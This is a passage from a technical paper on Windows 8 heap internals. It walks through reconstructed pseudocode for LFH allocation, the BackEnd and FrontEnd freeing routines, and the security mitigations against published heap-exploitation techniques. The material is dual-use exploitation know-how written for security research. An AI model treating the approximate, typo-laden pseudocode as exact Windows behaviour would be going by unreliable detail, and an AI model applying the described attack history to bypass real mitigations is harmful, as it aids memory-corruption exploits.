NewZone  = RtlAllocateHeap(LFH ‐>Heap, 0x800000,  0x3F8);   
if(!NewZone)  
  return 0;  
 
_LIST_ENTRY  *ZoneHead  = &LFH‐>SubSegmentZones;   
if(ZoneHead ‐>Flink‐>Blink == ZoneHead  && 
  ZoneHeader ‐>Blink‐>Flink == ZoneHead)  
{ 
  LinkIn(NewZone);   
 
  NewZone ‐>Limit = NewZone  + 0x3F8; 
  NewZone ‐>FreePointer  = NewZone  + sizeof (_LFH_BLOCK_ZONE);  
     
  //set the current  localdata  
  LFH‐>LocalData[LocalIndex] ‐>CrtZone  = NewZone;  
  goto try_zone;  
} 
else 
{ 
  //fast fail! 
  __asm {int 0x29};  
} 
 
Note : The int 0x29 interrupt was added as a way for developers  to quickly terminate  execution  in the 
event of linked list corruption.  Please see the Security Mitigations  section for more information.  
The RtlpLowFragHeapAllocFromContext  now has a UserBlock  container  and a viable Subsegment  for 
association.  Now the FrontEnd can initialize all the data in the UserBlocks  and set members  of the 
_HEAP_SUBSEGMENT,  which is achieved by calling RtlpSubSegmentInitialize.  It has a function 
signature  of:   
int RtlpSubSegmentInitialize(_LFH_HEAP  *LFH, _HEAP_SUBSEGMENT  *NewSubSeg,  
_HEAP_USERDATA_HEADER  *UserBlocks,  int ChunkSize,  int SizeNoHeader,  _HEAP_BUCKET  
*HeapBucket)  
  
//Initialize  the Subsegment,  which will divide out the  
//chunks  in the UserBlock  by writing  a _HEAP_ENTRY  header 
//every  HeapBucket ‐>BlockUnits  bytes 
NewSubseg ‐>AffinityIndex  = AffinityIndex;   
RtlpSubSegmentInitialize(LFH,  NewSubseg,  UserBlock,   
  RtlpBucketBlockSizes[HeapBucket ‐>SizeIndex],  SizeIndex  ‐ 8, HeapBucket);   
    
34 | Windows  8 Heap Internals 
 RtlpSubSegmentInitialize  will first attempt to find the proper _HEAP_LOCAL_SEGMENT_INFO  
structure for association  by using the affinity and allocation  request size as inputs to the 
SegmentInfoArrays .  
_HEAP_LOCAL_SEGMENT_INFO  *SegmentInfo;   
_INTERLOCK_SEQ  *AggrExchg  = NewSubSeg ‐>AggregateExchg;  
  
int AffinityIndex  = NewSubSeg ‐>AffinityIndex;   
int SizeIndex  = HeapBucket ‐>SizeIndex;   
 
//get the proper _HEAP_LOCAL_SEGMENT_INFO  based on affinity  
if(AffinityIndex)  
  SegmentInfo  = LFH‐>AffinitizedInfoArrays[SizeIndex][AffinityIndex  ‐ 1];  
else 
  SegmentInfo  = LFH‐>SegmentInfoArrays[SizeIndex];  
  
Next RtlpSubSegmentInitialize  is going to calculate the size of each chunk that will be in the 
UserBlock  container  by taking the 8‐byte rounded size and adding space for a chunk header . Once the 
total size of each chunk is determined,  the total number of chunks can be calculated,  taking into 
account the space for the _HEAP_USERDATA_HEADER  structure.  With the total size of chunks and the 
amount of memory available to a UserBlocks  finalized, the address for the first free offset can be 
calculated  for the UserBlocks.   
//figure  out the total sizes of each chunk in the UserBlocks  
unsigned  int TotalSize  = ChunkSize  + sizeof (_HEAP_ENTRY);  
unsigned  short BlockSize  = TotalSize  / 8;  
 
//this will be the number of chunks in the UserBlocks  
unsigned  int NumOfChunks  = (SizeNoHeader  ‐ sizeof (_HEAP_USERDATA_HEADER))  / TotalSize;   
 
//Set the _HEAP_SUBSEGMENT  and denote the end 
UserBlocks ‐>SfreeListEntry.Next  = NewSubSeg;  
 
char *UserBlockEnd  = UserBlock  + SizeNoHeader;   
 
//Get the offset of the first chunk that can be allocated  
//Windows  7 just used 0x2 (2 * 8), which was the size  
//of the _HEAP_USERDATA_HEADER  
unsigned  int FirstAllocOffset  = ((((NumOfChunks  + 0x1F) / 8) & 0x1FFFFFFC)  +  
  sizeof (_HEAP_USERDATA_HEADER))  & 0xFFFFFFF8;   
 
UserBlocks ‐>FirstAllocationOffset  = FirstAllocOffset;   
  
Note: The FirstAllocationOffset  was not needed in Windows  7 as the first free entry was implicitly 
after the 0x10 byte _HEAP_USERDATA_HEADER.   
  
35 | Windows  8 Heap Internals 
 After the size and quantity are calculated,  RtlpSubSegmentInitialize  will iterate through the contiguous  
piece of memory that currently makes up the UserBlocks , writing a _HEAP_ENTRY  header for each 
chunk.  
//if permitted,  start writing  chunk headers  every TotalSize  bytes 
if(UserBlocks  + FirstAllocOffset  + TotalSize  < UserBlockEnd)   
{  
  _HEAP_ENTRY  *CurrHeader  = UserBlocks  + FirstAllocOffset;  
 
  do 
  { 
   //set the encoded  lfh chunk header,  by XORing certain   
   //values.  This is how a Subsegment  can be derived  in RtlpLowFragHeapFree  
   *(DWORD)CurrHeader  = (DWORD)Heap ‐>Entry ^ NewSubSeg  ^  
    RtlpLFHKey  ^ (CurrHeader  >> 3);  
    
   //FreeEntryOffset  replacement  
   CurrHeader ‐>PreviousSize  = Index;  
    
   //denote  as a free chunk in the LFH 
   CurrHeader ‐>UnusedBytes  = 0x80;  
 
   //increment  the header and counter  
   CurrHeader  += TotalSize;   
   Index++;  
  } 
  while ((CurrHeader  + TotalSize)  < UserBlockEnd);  
} 
  
Note : You’ll notice how there is no FreeEntryOffset  being set, but the Index is stored in the PreviousSize  
field of the chunk header. The index is used to update the bitmap when freeing a chunk from the LFH.  
Since there is no longer a FreeEntryOffset  in each chunk, the UserBlocks  must track free chunks in a 
different way. It does free chunk tracking by marking up an associated  bitmap which has a 1‐to‐1 ratio 
of bits to chunks in the UserBlocks.  Initially all bits will be set to zero , owning to every chunk in the 
container  being free (it has just been created). After the bitmap is updated , the function will associate  
the _HEAP_LOCAL_SEGMENT_INFO  (SegmentInfo ) and _HEAP_USERDATA_HEADER  (UserBlocks ) with 
the newly acquired/created  _HEAP_SUBSEGMENT  (NewSubSeg ).  
//Initialize  the bitmap and zero out its memory (Index == Number of Chunks)  
RtlInitializeBitMap(&UserBlocks ‐>BusyBitmap;  UserBlocks ‐>BitmapData,  Index);  
 
char *Bitmap  = UserBlocks ‐>BusyBitmap ‐>Buffer;   
 
unsigned  int BitmapSize  = UserBlocks ‐>BusyBitmap ‐>SizeOfBitMap;   
 
memset(Bitmap,  0, (BitmapSize  + 7) / 8);  
 
//This will set all the members  of this structure  
//to the appropriate  values derived  from this func 
//associating  UserBlocks  and SegmentInfo  
UpdateSubsegment(NewSubSeg,SegmentInfo,  UserBlocks);  
36 | Windows  8 Heap Internals 
 Lastly, RtlpSubSegmentInitialize  will save the new Depth (number of chunks) and Hint (offset to a 
free chunk) in the newly created _INTERLOCK_SEQ  structure.  Also, RtlpLowFragHeapRandomData  will be 
updated, which is the array that stores unsigned random bytes used as starting points when looking for 
free chunks within a UserBlock  container.   
//Update  the random values each time a _HEAP_SUBSEGMENT  is init 
int DataSlot  = NtCurrentTeb() ‐>LowFragHeapDataSlot;  
 
//RtlpLowFragHeapRandomData  is generated  in  
//RtlpInitializeLfhRandomDataArray()  via RtlpCreateLowFragHeap  
short RandWord  = GetRandWord(RtlpLowFragHeapRandomData,  DataSlot);   
NtCurrentTeb() ‐>LowFragHeapDataSlot  = (DataSlot  + 2) & 0xFF;   
 
//update  the depth to be the amount of chunks we created  
_INTERLOCK_SEQ  NewAggrExchg;  
NewAggrExchg.Depth  = Index;  
NewAggrExchg.Hint  = RandWord  % (Index << 16);  
 
//swap of the old and new aggr_exchg  
int Result = _InterlockedCompareExchange(&NewSubSeg ‐>AggregateExchg,   
NewAggrExchg,  AggrExchg);   
 
//update  the previously  used SHORT w/ new random values 
if(!(RtlpLowFragHeapGlobalFlags  & 2)) 
{ 
  unsigned  short Slot = NtCurrentTeb() ‐>LowFragHeapDataSlot;  
 
  //ensure  that all bytes are unsigned  
  int Rand1 = RtlpHeapGenerateRandomValue32()  & 0x7F7F7F7F;  
  int Rand2 = RtlpHeapGenerateRandomValue32()  & 0x7F7F7F7F;  
 
  //reassign  the random data so it’s not the same for each Subsegment  
  RtlpLowFragHeapRandomData[Slot]  = Rand1; 
  RtlpLowFragHeapRandomData[Slot+1]  = Rand2; 
} 
 
return result;   
 
RtlpLowFragHeapAllocFromContext  has now acquired and calibrated  all the information  needed to 
service the request. The UserBlock  container  has been created based on the desired size. The 
Subsegment  has been acquired through various channels and associated  with the UserBlocks.  Lastly, the 
large contiguous  piece of memory for the UserBlocks  has been separated  into user digestible  chunks. 
RtlpLowFragHeapAllocFromContext  will skip back to the beginning  where the ActiveSubsegment  was 
used to service the allocation.   
 
UserBlock ‐>Signature  = 0xF0E0D0C0;   
 
LocalSegInfo ‐>ActiveSubsegment  = NewSubseg;   
 
//same logic seen in previous  code 
goto use_active_subsegment;   
 
 
37 | Windows  8 Heap Internals 
 Algorithms 	–	Freeing	
This section will go over the freeing algorithms  used by the Windows  8 Heap Manager.  The first 
subsection  will cover the Intermediate  algorithm  which determines  whether the chunk being freed will 
reside in LFH or the BackHeap  heap. The second subsection  details the BackEnd freeing mechanism,  
which is familiar, owing to its doubly linked list architecture.  Finally, the LFH de‐allocation  routine will be 
thoroughly  examined.  While the intermediate  and BackEnd algorithms  may look strikingly similar to the 
Windows  7 versions, the FrontEnd (LFH) freeing mechanism  has changed significantly.   
Note: Much of the code has been left out to simplify the learning process. Please contact me if more in‐
depth information  is desired 
Intermediate 	
Before a chunk can be officially freed, the Heap Manager must decide if the responsibility  lies with the 
BackEnd or FrontHeap  heap. The function that makes this decision is RtlFreeHeap.  It has a function 
signature  of:   
int RtlFreeHeap(_HEAP  *Heap, int Flags, void *Mem) 
 
The first step taken by RtlFreeHeap  is to ensure that a non‐NULL address is passed to the function. If 
the chunk is NULL, the function will just return. Therefore,  the freeing of NULL chunks to the user land 
heap has no effect. Next, the flags are examined  to determine  if the BackEnd freeing routine should be 
used before any other validation  occurs.  
 //the user‐land memory allocator  won't actually  
//free a NULL chunk passed to it 
if(!Mem) 
  return ; 
 
//the header to be used in the freeing  process  
_HEAP_ENTRY  *Header  = NULL; 
_HEAP_ENTRY  *HeaderOrig  = NULL;  
 
//you can force the heap to ALWAYS use the back‐end manager  
if(Heap‐>ForceFlags  & 0x1000000)  
  return RtlpFreeHeap(Heap,  Flags | 2, Header,  Mem);  
  
RtlFreeHeap  will now ensure that the memory being freed is 8‐byte aligned, as all heap memory should 
be 8‐byte aligned. If it is not, then a heap failure will be reported and the function will return.   
if(Mem & 7) 
{ 
  RtlpLogHeapFailure(9,  Heap, Mem, 0, 0, 0); 
  return ERROR;  
} 
  
 
38 | Windows  8 Heap Internals 
 The headers can now be checked, which are always located 8‐bytes behind the chunk of memory. The 
first header check will look at the SegmentOffset  to discern if header relocation  is necessary,  and if so, 
the header will be moved backwards  in memory. Then a check is made to guarantee  that the adjusted 
header is of the right type , aborting if the type is incorrect.   
//Get the _HEAP_ENTRY  header 
Header = Mem ‐ 8;  
HeaderOrig  = Mem ‐ 8;  
 
//ben hawkes technique  will use this adjustment  
//to point to another  chunk of memory  
if(Header ‐>UnusedBytes  == 0x5) 
  Header ‐= 8 * Header‐>SegmentOffset;  
 
//another  header check to ensure valid frees 
if(!(Header ‐>UnusedBytes  & 0x3F)) 
{ 
  RtlpLogHeapFailure(8,  Heap, Header,  0, 0, 0); 
  Header = NULL;  
} 
 
//if anything  went wrong, return ERROR 
if(!Header)  
  return ERROR; 
  
		
39 | Windows  8 Heap Internals 
 Additional  header validation  mechanisms  have been added to prevent an exploitation  technique  
published  by Ben Hawkes back in 2008 (Hawkes 2008). If header relocation  has taken place and the 
chunk resides in the LFH, the algorithm  verifies the adjusted header is actually meant to be freed by 
calling RtlpValidateLFHBlock.  If the chunk is not in the LFH, the headers are verified the traditional  
way by validating  that they are not tainted, returning  error on corruption .   
//look at the original  header,  NOT the adjusted  
bool valid_chunk  = false ; 
if(HeaderOrig ‐>UnusedBytes  == 0x5) 
{ 
  //look at adjusted  header to determine  if in the LFH 
  if(Header ‐>UnusedBytes  & 0x80) 
  { 
   //RIP Ben Hawkes SegmentOffset  attack :(  
   valid_chunk  = RtlpValidateLFHBlock(Heap,  Header);   
  } 
  else 
  { 
   if(Heap‐>EncodeFlagMask)  
   { 
    if(!DecodeValidateHeader(Heap,  Header))  
     RtlpLogHeapFailure(3,  Heap, Header,  Mem, 0, 0); 
    else 
     valid_chunk  = true ;  
   } 
  } 
 
  //if it’s found that this is a tainted  chunk, return ERROR 
  if(!valid_chunk)  
   return ERROR_BAD_CHUNK;  
} 
  
Lastly RtlFreeHeap  will decode the header (the first 4‐bytes are encoded ) and look at the UnusedBytes  
(Offset 0x7), which indicates if a chunk was allocated by the LFH or the BackEnd heap, choosing either 
RtlpLowFragHeapFree  or RtlpFreeHeap,  respectively.   
//This will attempt  to decode the header (diff for LFH and Back‐End) 
//and ensure that all the meta‐data is correct  
Header = DecodeValidateHeader(Heap,  Header);  
 
//being  bitwase  ANDed with 0x80 denotes  a chunk from the LFH 
if(Header ‐>UnusedBytes  & 0x80) 
  return RtlpLowFragHeapFree(Heap,  Header);  
else 
  return RtlpFreeHeap(Heap,  Flags | 2, Header,  Mem); 
  
40 | Windows  8 Heap Internals 
 BackEnd 	
The Windows  8 BackEnd de‐allocator is very similar to the Windows  7 BackEnd. It will insert a chunk 
being freed onto a doubly‐linked list, but instead of updating counters in a back link, the routine will 
update the FrontEndHeapUsageData  to indicate if the LFH should be used on subsequent  allocations.  
The function responsible  for BackEnd freeing is RtlpFreeHeap  and has a signature  of:   
int RtlpFreeHeap(_HEAP  *Heap, int Flags, _HEAP_ENTRY  *Header,  void *Chunk) 
 
Before the act of freeing a chunk can be accomplished  the heap manager will do some preliminary  
validation  of the chunk being freed to ensure that it meets a certain level of integrity. The chunk is 
tested against the address of the _HEAP structure managing  it to make sure they don’t point to the 
same location. If that test passes, the chunk header will be decoded and validated . Both tests result in 
returning  with error upon failure .  
//prevent  freeing  of a _HEAP structure  (Ben Hawkes technique  dead) 
if(Heap == Header)  
{ 
  RtlpLogHeapFailure(9,  Heap, Header,  0,0,0);  
  return ; 
} 
 
//attempt  to decode and validate  the header  
//if it doesn't  decode properly,  abort 
if(Heap‐>EncodeFlagMask)  
  if(!DecodeValidateHeader(Header,  Heap)) 
   return ; 
  
Note: The _HEAP structure check is new to Windows  8 
The next step is to traverse the BlocksIndex  structures  looking for one that can track the chunk being 
freed (based on size). Before standard freeing occurs, the BackEnd will check to see if certain header 
characteristics  exist, denoting a virtually allocated chunk and if so, call the virtual de‐allocator.     
//search  for the appropriately  sized blocksindex  
_HEAP_LIST_LOOKUP  *BlocksIndex  = Heap‐>BlocksIndex;   
do 
{ 
  if(Header ‐>Size < BlocksIndex ‐>ArraySize)  
   break ; 
 
  BlocksIndex  = BlocksIndex ‐>ExtendedLookup;   
} 
while (BlocksIndex);  
 
//the UnusedBytes  (offset:  0x7) are used for many things 
//a value of 0x4 indicates  that the chunk was virtually   
//allocated  and needs to be freed that way (safe linking  included)  
if(Header ‐>UnusedBytes  == 0x4) 
  return VirtualFree(Head,  Header);  
41 | Windows  8 Heap Internals 
  RtlpFreeHeap  will then update the heap’s FrontEndHeapUsageData  pending the size comparison  of the 
chunk. This effectively  will only update the usage data if the chunk being freed could be serviced by the 
LFH (FrontEnd).  By decrementing  the value, the heuristic to trigger LFH allocation  for this size has been 
put back by one, requiring more consecutive  allocations  before the FrontEnd heap will be used.   
//Get the size and check to see if it’s under the  
//maximum  permitted  for the LFH 
int Size = Header‐>Size;  
 
//if the chunk is capable  of being serviced  by the LFH then check the  
//counters,  if they are greater  than 1 decrement  the value to denote 
//that an item has been freed, remember,  you need at least 16 CONSECUTIVE  
//allocations  to enable the LFH for a given size 
if(Size < Heap‐>FrontEndHeapMaximumIndex)  
{ 
  if(!( (1 << Size & 7) & (heap‐>FrontEndStatusBitmap[Size  / 8]))) 
  { 
   if(Heap‐>FrontEndHeapUsageData[Size]  > 1) 
    Heap‐>FrontEndHeapUsageData[Size] ‐‐;  
  } 
} 
  
Now that the validation  and heuristics  are out of the way, the de‐allocator can attempt, pending the 
heap’s permission , to coalesce chunks adjacent to the one being freed. What this means is that the 
chunk before and the chunk after are checked for being FREE . If either chunk is free then they will be 
combined  into a larger chunk to avoid fragmentation  (something  the LFH directly addresses).  If the total 
size of the combined  chunks exceeds certain limits it will be de‐committed  and potentially  added to a 
list of large virtual chunks.  
//if we can coalesce  the chunks adjacent  to this one, do it to  
//avoid  fragmentation  (something  the LFH directly  addresses)  
int CoalescedSize;   
if(!(heap ‐>Flags 0x80)) 
{ 
  Header = RtlpCoalesceFreeBlocks(Heap,  Header,  &CoalescedSize,  0);  
 
  //if the combined  space is greater  than the Heap‐>DecommittThreshold  
  //then decommit  the chunk from memory 
  DetermineDecommitStatus(Heap,  Header,  CoalescedSize);  
 
  //if the chunk is greater  than the VirtualMemoryThreshold  
  //insert  it and update the appropriate  lists 
  if(CoalescedSize  > 0xFE00)  
   RtlpInsertFreeBlock(Heap,  Header,  CoalescedSize);  
} 
  
  
42 | Windows  8 Heap Internals 
 The chunk (which is potentially  bigger than when it was originally submitted  for freeing) is now ready to 
be linked into the FreeLists . The algorithm  will start searching  the beginning  of the list for a chunk that 
is greater than or equal to the size of the chunk being freed to be used as the insertion point.  
//get a pointer  to the FreeList  head 
_LIST_ENTRY  *InsertPoint  = &Heap‐>FreeLists;  
_LIST_ENTRY  *NewNode;  
  
//get the blocks index and attempt  to assign 
//the index at which to free the current  chunk 
_HEAP_LIST_LOOKUP  *BlocksIndex  = Heap‐>BlocksIndex;  
int ListHintIndex;   
  
Header‐>Flags = 0;  
Header‐>UnusedBytes  = 0;  
 
//attempt  to find the proper insertion  point to insert 
//chunk  being freed, which will happen at the when a freelist  
//entry  that is greater  than or equal to CoalescedSize  is located  
if(Heap‐>BlocksIndex)  
  InsertPoint  = RtlpFindEntry(Heap,  CoalescedSize);  
else 
  InsertPoint  = *InsertPoint;   
 
//find the insertion  point within the freelists   
while (&heap‐>FreeLists  != InsertPoint)  
{ 
  _HEAP_ENTRY  *CurrEntry  = InsertPoint  ‐ 8;  
  if(heap‐>EncodeFlagMask)  
   DecodeHeader(CurrEntry,  Heap); 
 
  if(CoalescedSize  <= CurrEntry ‐>Size) 
   break ; 
 
  InsertPoint  = InsertPoint ‐>Flink;  
} 
  
  
43 | Windows  8 Heap Internals 
 Before the chunk is linked into the FreeLists a check, which was introduced  in Windows  7, is made to 
ensure that the FreeLists haven’t been corrupted , avoiding the infamous  write‐4 primitive (insertion 
attack). 
//insertion  attacks  FOILED!  Hi Brett Moore/Nico  
NewNode  = Header + 8;  
_LIST_ENTRY  *Blink = InsertPoint ‐>Blink;  
if(Blink‐>Flink == InsertPoint)  
{ 
  NewNode ‐>Flink = InsertPoint;   
  NewNode ‐>Blink = Blink; 
  Blink‐>Flink = NewNode;  
  Blink = NewNode;   
} 
else 
{ 
  RtlpLogHeapFailure(12,  0, InsertPoint,  0, Blink‐>Flink,  0); 
} 
 
Lastly, the freeing routine will set the TotalFreeSize  to reflect the overall amount of free space gained in 
this de‐allocation  and update the ListHints . Even though the FreeLists have been updated (code above) 
the ListHint optimizations  must also be updated so that the FrontEnd Allocator can quickly find 
specifically  sized chunks.  
//update  the total free blocks available  to this heap 
Heap‐>TotalFreeSize  += Header‐>Size;  
 
//if we have a valid _HEAP_LIST_LOOKUP  structure,  find 
//the appropriate  index to use to update the ListHints  
if(BlocksIndex)  
{ 
  int Size = Header‐>Size; 
int ListHintIndex;  
 
  while (Size >= BlocksIndex ‐>ArraySize)  
  { 
   if(!BlocksIndex ‐>ExtendedLookup)  
   { 
    ListHintIndex  = BlocksIndex ‐>ArraySize  ‐ 1;  
    break ; 
   } 
 
   BlocksIndex  = BlocksIndex ‐>ExtendedLookup;  
  } 
 
  //add the current  entry to the ListHints  doubly linked list 
  RtlpHeapAddListEntry(Heap,  BlocksIndex,  RtlpHeapFreeListCompare,   
   NewNode,  ListHintIndex,  Size); 
} 
  
44 | Windows  8 Heap Internals 
 FrontEnd 	
The sole FrontEnd de‐allocator for Windows  8 is the Low Fragmentation  Heap (LFH), which can manage 
chunks that are 0x4000 bytes (16k) or below. Like the FrontEnd Allocator , the freeing mechanism  puts 
chunks back into a UserBlocks  but no longer relies on the _INTERLOCK_SEQ  structure to determine  the 
offset within the overall container.  The new functionality  that makes up the Windows  8 FrontEnd de‐
allocator makes freeing much more simple and secure. The function responsible  for LFH freeing is 
RtlpLowFragHeapFree  and has a function signature  of:  
int RtlpLowFragHeapFree(_HEAP  *Heap, _HEAP_ENTRY  *Header)  
 
The first step in the LFH freeing process starts with deriving the _HEAP_SUBSEGMENT  (Subsegment)  
and _HEAP_USERDATA_HEADER  (UserBlocks)  from the chunk being freed. While I don’t officially 
categorize  the Subsegment  derivation  as a security mechanism,  it does foil the freeing of a chunk that 
has a corrupted  chunk header (which would most likely occur through a sequential  heap overflow ).  
//derive  the subsegment  from the chunk to be freed, this  
//can royally  screw up an exploit  for a sequential  overflow  
_HEAP_SUBSEGMENT  *Subseg  = (DWORD)Heap  ^ RtlpLFHKey  ^ *(DWORD)Header  ^ (Header  >> 3);  
 
_HEAP_USERDATA_HEADER  *UserBlocks  = Subseg‐>UserBlocks;   
 
//Get the AggrExchg  which contains  the Depth (how many left) 
//and the Hint (at what offset)  [not really used anymore]  
_INTERLOCK_SEQ  *AggrExchg  = AtomicAcquireIntSeq(Subseg);   
  
Next, the bitmap must be updated to indicate that a chunk at a certain offset within the UserBlocks  is 
now available for allocation,  as it has just been freed. The index is acquired by accessing  the 
PreviousSize  field in the chunk header. This is quite similar to using the FreeEntryOffset  in Windows  7 
with the added protection  of being protected  by the encoded chunk header which precedes it.   
//the PreviousSize  is now used to hold the index into the UserBlock  
//for each chunk. this is somewhat  like the FreeEntryOffset  used before it 
//See RtlpSubSegmentInitialize()  for details  on how this is initialized  
short BitmapIndex  = Header‐>PreviousSize;  
 
//Set the chunk as free 
Header‐>UnusedBytes  = 0x80; 
 
//zero out the bitmap based on the predefined  index set in RtlpSubSegmentInitialize  
//via the BTR (Bit‐test and Reset) x86 instruction  
bittestandreset(UserBlocks ‐>BusyBitmap ‐>Buffer,  BitmapIndex);  
  
  
45 | Windows  8 Heap Internals 
 For all intents and purposes the chunk is now FREE , although additional  actions must be performed.  Any 
chunks that were meant to be freed previously  but failed will be given another opportunity  by accessing  
the DelayFreeList.  Then the newly updated values of Depth (how many left) and Hint (where the next 
free chunk is) are assigned and updated to reflect the freed chunks.  If the UserBlocks  isn’t completely  
FREE, that is there exists at least one chunk that is BUSY within a UserBlock  container,  then the 
Subsegment  will be updated and the function will return.  
//Chunks  can be deferred  for freeing  at a later time 
//If there are any of these chunks,  attempt  to free them 
//by resetting  the bitmap 
int DelayedFreeCount;  
if(Subseg ‐>DelayFreeList ‐>Depth)  
  FreeDelayedChunks(Subseg,  &DelayedFreeCount);  
 
//now it’s time to update the Depth and Hint for the current  Subsegment  
//1) The Depth will be increased  by 1, since we're adding an item back into the UserBlock  
//2) The Hint will be set to the index of the chunk being freed 
_INTERLOCK_SEQ  NewSeq;   
int NewDepth  = AggrExchg ‐>Depth + 1 + DelayedFreeCount;  
NewSeq.Depth  = NewDepth;   
NewSeq.Hint  = BitmapIndex;   
 
//if the UserBlocks  still have BUSY chunks in it then update  
//the AggregateExchg  and return back to the calling  function  
if(!EmptyUserBlock(Subseg))  
{ 
  Subseg‐>AggregateExchang  = NewSeq;   
  return NewSeq;   
} 
  
If it is determined  that the Subsegment  hosts a UserBlock  container  that is no longer necessary  the 
freeing algorithm  will update some of its members  and proceed to mark the Depth and Hint to be NULL , 
indicating  that there is no viable UserBlocks  associated  with the Subsegment .  
//Update  the list if we've freed any chunks 
//that were previously  in the delayed  state 
UpdateDelayedFreeList(Subseg);  
 
//update  the CachedItem[]  array with the _HEAP_SUBSEGMENT  
//we're  about to free below 
UpdateCache(Subseg ‐>LocalInfo);  
 
Subseg‐>AggregateExchang.Depth  = 0; 
Subseg‐>AggregateExchang.Hint  = 0; 
 
int ret = InterlockedExchange(&Subseg ‐>ActiveSubsegment,  0); 
if(ret) 
  UpdateLockingMechanisms(Subseg)  
  
  
46 | Windows  8 Heap Internals 
 Certain flags in the _HEAP_SUBSEGMENT  might indicate that the next page aligned address from the 
start of the UserBlocks  may be better off having non‐execute permissions.  The non‐execute permissions  
will prevent memory, most likely from some sort of spray, from being used as an executable  pivot in a 
potential exploit.  
//if certain  flags are set this will mark prtection  for the next page in the userblock  
if(Subseg ‐>Flags & 3 != 0) 
{ 
  //get a page aligned  address  
  void *PageAligned  = (Subseg ‐>UserBlock  + 0x101F)  & 0xFFFFF000;   
  
int UserBlockByteSize  = Subseg‐>BlockCount  * RtlpGetReservedBlockSize(Subseg);  
  UserBlockByteSize  *= 8;  
 
  //depending  on the flags, make the memory read/write  or rwx 
  //http://msdn.microsoft.com/en ‐us/library/windows/desktop/aa366786(v=vs.85).aspx  
  DWORD Protect  = PAGE_READWRITE;  
  if(flags & 40000 != 0) 
   Protect  = PAGE_EXECUTE_READWRITE;  
 
  //insert  a non‐executable  memory page 
  DWORD output;   
  ZwProtectVirtualMemory( ‐1, &PageAligned,  &UserBlockByteSize,  Protect,  &output);  
} 
  
Finally the UserBlock  container  can be freed , which means all the chunks within it are effectively  freed 
(Although  not freed individually).   
//Free all the chunks (not individually)  by freeing  the UserBlocks  structure  
Subseg‐>UserBlocks ‐>Signature  = 0;  
RtlpFreeUserBlock(Subseg ‐>LocalInfo ‐>LocalData ‐>LowFragHeap,  Subseg‐>UserBlocks);   
 
return ; 
  
  
47 | Windows  8 Heap Internals 
 Security 	Mechanisms 	
This section will cover the security mechanisms  introduced  in Windows  8 Release Preview. These 
security features were added to directly address the most modern exploitation  techniques  employed  by 
attackers at the time of writing. The anti‐exploitation  features will start with those residing in the 
BackEnd manager and then continue with mitigations  present in the FrontEnd .  
_HEAP	Handle	Protection 	
Back in 2008 Ben Hawkes proposed  a payload that, if used to overwrite  a _HEAP structure,  could result 
in the execution  of an attacker supplied address after a subsequent  allocation  (Hawkes 2008). Windows  
8 mitigates  the aforementioned  exploitation  technique  by ensuring that a chunk being freed is not the 
heap handle that is freeing it. Although there may exist a corner case of a chunk being freed that 
belongs to a different _HEAP structure than the one freeing it, the likelihood  is extremely  low.  
RtlpFreeHeap(_HEAP  *heap, DWORD flags, void *header,  void *mem) 
{ 
  . 
  . 
  . 
 
  if(heap == header)   
  { 
   RtlpLogHeapFailure(9,  heap, header,  0, 0, 0); 
   return 0;  
  } 
  
  . 
  . 
  . 
} 
 
Note : The same functionality  exists in RtlpReAllocateHeap()  
   
48 | Windows  8 Heap Internals 
 Virtual	Memory 	Randomization 	
If an allocation  request is received by RtlpAllocateHeap  that exceeded  the VirtualMemoryThreshold  
the heap manager will call NtAllocateVirtualMemory()  instead of using the FreeLists . These virtual 
allocations  have the tendency  to have predictable  memory layouts due to their infrequent  use and 
could be used as a primitive in a memory corruption  exploit. Windows  8 will now adds randomness  to 
the address of each virtual allocation . Therefore  each virtual allocation  will start at a random offset 
within the overall virtual chunk, removing  predictability  of heap meta‐data in the chance over a 
sequential  overflow.     
//VirtualMemoryThreshold  set to 0x7F000  in CreateHeap()  
int request_size  = Round(request_size)  
int block_size  = request_size  / 8;  
if(block_size  > heap‐>VirtualMemoryThreshold)  
{ 
  int rand_offset  = (RtlpHeapGenerateRandomValue32()  & 0xF) << 12; 
  
request_size  += 24; 
 
  int region_size  = request_size  + 0x1000 + rand_offset;  
 
  void *virtual_base,  *virtual_chunk;  
 
  int protect  = PAGE_READWRITE;  
  if(heap‐>flags & 0x40000)  
   protect  = PAGE_EXECUTE_READWRITE;  
 
  //Attempt  to reserve  region size bytes of memory 
  if(NtAllocateVirtualMemory( ‐1, &virtual_base,  0, &region_size,   
   MEM_RESERVE,  protect)  < 0) 
   goto cleanup_and_return;   
 
  virtual_chunk  = virtual_base  + rand_offset;   
  if(NtAllocateVirtualMemory( ‐1, &virtual_chunk,  0, &request_size,   
   MEM_COMMIT,  protect)  < 0) 
   goto cleanup_and_return;   
 
  //XXX Set headers  and safe link‐in  
 
  return virtual_chunk;  
} 
  
Note: The size of each virtually allocated chunk is also randomized  to a certain extent providing  
additional  protection  against heap determinism.   
  	
49 | Windows  8 Heap Internals 
 FrontEnd 	Activation 	
Windows  7 used the ListHints as a multi‐purpose data structure.  The first function was to provide an 
optimization  to the BackEnd heap when servicing allocations,  instead of having to completely  traverse 
the FreeLists . The second function was to use the ListHint‐>Blink for an allocation  counter and data 
storage. If the allocation  counter exceeded  the threshold  (16 consecutive  allocations  of the same size), 
the LFH would be activated  for that size and the address of _HEAP_BUCKET  would be placed in the 
Blink. This dual‐purpose functionality  has been replaced with a much more efficient and straight 
forward solution using dedicated  counters and a bitmap . The new data structures  are used to indicate 
how many allocations  for a specific size have been requested  and what _HEAP_BUCKETs  are activated.   
As you saw in the BackEnd Algorithms  allocation  section, the FrontEndHeapUsageData  array is used to 
store the allocation  count or the index into the _HEAP_BUCKET  array within a _LFH_HEAP.  These two 
measures  make bucket activation  less complicated  while also mitigating  the _HEAP_BUCKET  overwrite  
attack made popular by Ben Hawkes a few years ago (Hawkes 2008).   
else if(Size < 0x4000)  
{ 
  //Heap‐>FrontEndHeapStatusBitmap  has 256 possible  entries  
  int BitmapIndex  = BlockSize  / 8; 
  int BitPos = BlockSize  & 7;  
 
  //determine  if the LFH should be activated   
  if(!( (1 << BitPos)  & Heap‐>FrontEndHeapStatusBitmap[BitmapIndex])  ) 
  { 
   //increment  the counter  used to determine  when to use the LFH 
   int Count = Heap‐>FrontEndHeapUsageData[BlockSize]  + 0x21;  
   Heap‐>FrontEndHeapUsageData[BlockSize]  = Count;  
 
   //if there were 16 consecutive  allocation  or many allocations  consider  LFH  
   if((Count  & 0x1F) > 0x10 || Count > 0xFF00)  
   { 
    _LFH_HEAP  *LFH = NULL;  
    if(Heap‐>FrontEndHeapType  == 2) 
